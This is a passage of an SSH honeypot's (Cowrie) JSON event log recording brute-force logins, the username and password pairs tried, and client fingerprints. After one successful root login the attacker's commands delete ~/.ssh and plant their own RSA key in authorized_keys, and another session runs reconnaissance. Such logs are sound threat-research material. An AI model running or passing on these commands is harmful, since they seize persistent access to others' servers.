chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:35:35.234955Z","src_ip":"212.227.235.229","session":"7b02d7820a81"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:35:35.681123Z","src_ip":"212.227.235.229","session":"7b02d7820a81"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:36.837021Z","src_ip":"212.227.235.229","session":"7b02d7820a81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52114,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e257eee67ec","protocol":"ssh","message":"New connection: 212.227.125.160:52114 (1.2.3.4:22) [session: 8e257eee67ec]","sensor":"my-vps","timestamp":"2025-08-28T05:35:41.718883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:35:41.762138Z","src_ip":"212.227.125.160","session":"8e257eee67ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:35:41.844867Z","src_ip":"212.227.125.160","session":"8e257eee67ec"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:35:42.243450Z","src_ip":"212.227.125.160","session":"8e257eee67ec"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:43.350263Z","src_ip":"212.227.125.160","session":"8e257eee67ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40760,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb38ebd9c4fc","protocol":"ssh","message":"New connection: 212.227.235.229:40760 (1.2.3.4:22) [session: eb38ebd9c4fc]","sensor":"my-vps","timestamp":"2025-08-28T05:35:51.857614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:35:51.858980Z","src_ip":"212.227.235.229","session":"eb38ebd9c4fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:35:52.003392Z","src_ip":"212.227.235.229","session":"eb38ebd9c4fc"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:35:52.438951Z","src_ip":"212.227.235.229","session":"eb38ebd9c4fc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:53.585406Z","src_ip":"212.227.235.229","session":"eb38ebd9c4fc"}
{"eventid":"cowrie.session.connect","src_ip":"116.253.213.64","src_port":51302,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e3d1860d3b7","protocol":"ssh","message":"New connection: 116.253.213.64:51302 (1.2.3.4:22) [session: 6e3d1860d3b7]","sensor":"my-vps","timestamp":"2025-08-28T05:35:54.838952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:35:54.841834Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:35:55.083449Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.login.success","username":"root","password":"chocolate","message":"login attempt [root/chocolate] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:35:56.028800Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:35:56.604700Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:35:56.605473Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:35:56.606285Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59840,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ce8c341f1c6","protocol":"ssh","message":"New connection: 212.227.125.160:59840 (1.2.3.4:22) [session: 8ce8c341f1c6]","sensor":"my-vps","timestamp":"2025-08-28T05:35:56.607929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:35:56.608977Z","src_ip":"212.227.125.160","session":"8ce8c341f1c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:35:56.713519Z","src_ip":"212.227.125.160","session":"8ce8c341f1c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:56.839144Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.031405Z","src_ip":"212.227.125.160","session":"8ce8c341f1c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:35:57.267933Z","src_ip":"212.227.125.160","session":"8ce8c341f1c6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.268623Z","src_ip":"212.227.125.160","session":"8ce8c341f1c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:35:57.406163Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.406860Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.409616Z","src_ip":"212.227.125.160","session":"8ce8c341f1c6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.410600Z","src_ip":"212.227.125.160","session":"8ce8c341f1c6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.648803Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.649637Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.session.connect","src_ip":"116.253.213.64","src_port":51960,"dst_ip":"1.2.3.4","dst_port":22,"session":"18703b154ea1","protocol":"ssh","message":"New connection: 116.253.213.64:51960 (1.2.3.4:22) [session: 18703b154ea1]","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.870558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:35:57.871614Z","src_ip":"116.253.213.64","session":"18703b154ea1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:35:58.087994Z","src_ip":"116.253.213.64","session":"18703b154ea1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T05:35:59.003058Z","src_ip":"116.253.213.64","session":"18703b154ea1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:00.232314Z","src_ip":"116.253.213.64","session":"18703b154ea1"}
{"eventid":"cowrie.session.connect","src_ip":"116.253.213.64","src_port":52484,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ccd9c2ec1ca","protocol":"ssh","message":"New connection: 116.253.213.64:52484 (1.2.3.4:22) [session: 8ccd9c2ec1ca]","sensor":"my-vps","timestamp":"2025-08-28T05:36:00.454738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:36:00.457571Z","src_ip":"116.253.213.64","session":"8ccd9c2ec1ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:36:00.676350Z","src_ip":"116.253.213.64","session":"8ccd9c2ec1ca"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:36:05.298010Z","src_ip":"116.253.213.64","session":"8ccd9c2ec1ca"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:05.530510Z","src_ip":"116.253.213.64","session":"6e3d1860d3b7"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:05.531665Z","src_ip":"116.253.213.64","session":"8ccd9c2ec1ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51772,"dst_ip":"1.2.3.4","dst_port":22,"session":"96efdb1dfa35","protocol":"ssh","message":"New connection: 212.227.125.160:51772 (1.2.3.4:22) [session: 96efdb1dfa35]","sensor":"my-vps","timestamp":"2025-08-28T05:36:11.796032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:36:11.818500Z","src_ip":"212.227.125.160","session":"96efdb1dfa35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:36:11.916806Z","src_ip":"212.227.125.160","session":"96efdb1dfa35"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-28T05:36:12.532542Z","src_ip":"212.227.125.160","session":"96efdb1dfa35"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:13.639934Z","src_ip":"212.227.125.160","session":"96efdb1dfa35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53488,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ddf40fa37fa","protocol":"ssh","message":"New connection: 212.227.235.229:53488 (1.2.3.4:22) [session: 7ddf40fa37fa]","sensor":"my-vps","timestamp":"2025-08-28T05:36:18.969706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:36:18.970482Z","src_ip":"212.227.235.229","session":"7ddf40fa37fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:36:19.115699Z","src_ip":"212.227.235.229","session":"7ddf40fa37fa"}
